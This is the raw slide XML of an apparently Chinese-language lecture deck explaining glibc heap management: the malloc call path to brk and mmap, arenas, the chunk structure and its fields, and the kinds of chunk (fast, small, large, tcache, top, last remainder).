            <a:ext cx="2069123" cy="646331"/>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brk</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mmap</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6501412-DFA9-4B90-9B1C-2E7885255270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="1318847"/>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Application</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC03BAF9-DA9D-41FF-ABDC-5FC6E5E3E5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695092" y="2652266"/>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malloc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C54A7A1-7DC9-4CD7-96E6-DE1A6EF3C5DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780942" y="2210459"/>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89004C6-0788-4A1E-AC89-BDEDCEECCE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25233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brk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766D6B21-7803-419E-8FBB-1CBE7B231DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25233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sys_brk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直接箭头连接符 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035D7C96-DD7C-43D0-B1BF-2D22E3F751A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36092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9A8E815-FED5-4F05-8E54-3D044EED2DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68667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mmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECB23D1-6A0A-445A-8DD5-246D9C33C44B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68667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sys_mmap_pgoff</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC94D23-3203-4B44-AD12-3F2B931CB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79526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E8605CC-3792-40EE-8A71-ABA55B756224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="360924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E1F5481-D9D7-4885-93FB-0C773DC2E084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686679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30A99F5-EC69-4E59-B505-1596B3AD8EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008314" y="1441487"/>
            <a:ext cx="2287806" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>application code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C87CC7C5-A993-4186-B1A5-431C481BF2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266222" y="2782669"/>
            <a:ext cx="2287806" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>library code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C68AE16C-E114-4E0C-8EAB-BB0BDED56ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245114" y="4216925"/>
            <a:ext cx="2980303" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>code to trap to kernel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8380084-43C7-4294-BC5E-3390350F98AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319493" y="5651181"/>
            <a:ext cx="1415772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kernel code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB23002-1E54-438D-B1DB-D6CB03CEAE0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86889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5A1F7AC9-3502-47B0-A3C3-3E2980746230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3054320"/>
            <a:ext cx="6096000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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内存分配区，可以理解为堆管理器所持有的内存池</a:t>
            </a:r>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堆管理器与用户的内存交易发生于arena中，可以理解为堆管理器向操作系统批发来的有冗余的内存库存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B07BB0-1C0A-4F04-9311-8E555AF67B3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arena</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A08056-F93F-446F-BCEE-F4BBEAFBFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275630" y="1957072"/>
            <a:ext cx="1336841"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arena</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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9C94CFC-A477-4D10-B09D-935E70B991FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3438931"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>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操作系统 --&gt; 堆管理器 --&gt; 用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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物理内存 --&gt; a r e n a  --&gt; 可用内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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7444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026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C41CFCB-9DDA-4334-A75C-60D9AB162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429" y="0"/>
            <a:ext cx="9061142" cy="679585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C6D244A-9781-420A-B6C5-0238431B279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96181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F79104FD-1E06-4D2A-A36D-ACF43B416EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905957" y="2528788"/>
            <a:ext cx="6096000" cy="646331"/>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用户申请内存的单位，也是堆管理器管理内存的基本单位 malloc()返回的指针指向一个chunk的数据区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE718175-6D55-4E7B-AD94-3DACCF3AD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04" y="3709018"/>
            <a:ext cx="5114925" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5C8C3A-53BA-41DF-ACCF-047C2E2F02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4D780E74-BD47-4AEE-94DA-FDE51D950314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5107619" y="1410114"/>
            <a:ext cx="1692676"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92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07C3B8-10D3-478D-A4AD-39BFBD97F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82" y="944407"/>
            <a:ext cx="9926435" cy="5458587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830F8F2F-B7A8-459D-B16F-F6D68325B59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2928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7AD8D2B1-0D03-4644-9E81-AF8C3F010851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623047" y="2704745"/>
            <a:ext cx="10945905" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>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INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prev_size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of previous chunk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INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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in bytes, including overhead. */</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bk</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Only used for large blocks: pointer to next larger size.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fd_nextsize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bk_nextsize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5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{166E0DED-28C0-4190-866B-690CC29D18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8D3F76CA-9309-492B-9CE0-550A998FCD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139951" y="1215326"/>
            <a:ext cx="3912095"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的具体实现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21525976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658256" y="1807750"/>
            <a:ext cx="279114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的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56F0253-9DCB-4083-BBEF-7D3779A1472C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572426" y="2825271"/>
            <a:ext cx="1593706" cy="135421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按状态</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malloced</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free</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CF440F0-A79E-4957-A821-9781148596CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462076" y="2779105"/>
            <a:ext cx="1267848" cy="196977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按大小</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fast</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small</a:t>
            </a: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targe</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tcache</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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341D0F3-0A7E-4818-9C3E-99EE2FF5057D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8025868" y="2779105"/>
            <a:ext cx="3048783" cy="144655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按特定功能</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top</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chunk</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last remainder chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37265622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101622" y="2751150"/>
            <a:ext cx="343555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malloced chunk</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48BE0E1-D079-4668-AD06-B4515927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2" y="2324100"/>
            <a:ext cx="5114925" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649B9D90-6693-4A9C-8038-9E413FD71C5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文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF43411A-5AE2-482A-8651-C4678FC8EACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563372" y="3429000"/>
            <a:ext cx="507542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已被分配且填写了相应数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>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389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5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F5152D-27CC-4EDF-A600-10ECA98D2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15723"/>
            <a:ext cx="5114925" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4CCF9D-4DB1-42CF-B51D-E4C003DC1CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="23771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free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ACA2784-8576-4AD1-BE2B-DA464BC89194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="4161028" cy="830997"/>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被释放掉的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>malloced chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free 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7367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6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9087ADB7-82E4-4784-BC06-A7620EC72F6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92089" y="574981"/>
            <a:ext cx="3228975" cy="6019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38B9681-3CC0-4FDB-AA68-F96BBF2E2B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="2271584"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top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5512B09-2395-4BFB-9445-C7809A3217B6}"/>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arena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中从未被使用过的内存区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="654226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550380" y="2844225"/>
            <a:ext cx="453803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last remainder chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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21A0630-3344-46EB-AEAD-D2B5FE908453}"/>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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>分割原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea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rPr>
              <a:t>后剩余的部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B16F5F4-C470-4757-9C39-A0588AC20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585" y="1843087"/>
            <a:ext cx="3381375" cy="3171825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40927524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875500" y="919723"/>
            <a:ext cx="367600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的微观结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221A0630-3344-46EB-AEAD-D2B5FE908453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080005" y="2013225"/>
            <a:ext cx="2400555"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prev_size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A</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M</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P</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bk</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fd_nextsize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bk_nextsize</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
        <p:nvSpPr>
          <p:cNvPr id="2" name="右大括号 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9619FF95-48F4-4A5F-9474-33B6798860EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="2181255"/>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7" name="右大括号 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DF8F51-B4E4-44C3-A39E-616B6931EB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="5097175"/>
            <a:ext cx="324946" cy="58477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9" name="右大括号 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
